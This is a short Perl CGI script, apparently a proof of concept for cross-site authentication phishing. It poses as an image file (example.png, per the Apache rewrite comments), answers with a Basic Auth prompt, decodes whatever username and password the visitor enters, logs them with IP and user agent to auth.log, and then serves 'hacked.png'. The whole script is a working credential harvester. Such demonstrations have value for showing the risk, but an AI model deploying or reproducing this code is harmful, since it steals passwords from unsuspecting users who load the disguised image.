#!/usr/bin/perl

# To give the script access to the authentication data, I use the following
# snippet in the apache configuration:
# 
#    RewriteEngine on
#    RewriteCond %{HTTP:Authorization} ^(.*)
#    RewriteRule /xsa-test/example.png - [e=HTTP_AUTHORIZATION:%1]
#    ScriptAlias /xsa-test/example.png /var/www/nomeata.de/xsa-test/nph-example.pl


use strict;

use CGI qw/:cgi -nph/;
use MIME::Base64;


my $q = CGI->new();

if ($ENV{HTTP_AUTHORIZATION}) {
	if ($ENV{HTTP_AUTHORIZATION} =~ /^Basic (.*)$/) {
		my $base64 = $1;
		my $creds = decode_base64($base64);
		my $logstring = sprintf "%s %s running %s: %s\n",scalar (localtime), $ENV{REMOTE_ADDR}, $ENV{'HTTP_USER_AGENT'}, $creds;
	        if (length($logstring) < 300) {
			open LOG, '>>', "auth.log";
			print LOG $logstring;
			close LOG;
		}

	}
	print $q->header(-type=>'image/png');
	exec('cat hacked.png');
} else {
	print $q->header(-type=>'text/plain',
		-status=>'401 Authentication required',
		"-WWW-Authenticate" => 'Basic realm="XSA example - this string is arbitrary"'
		);
	print "Please authenticate";
}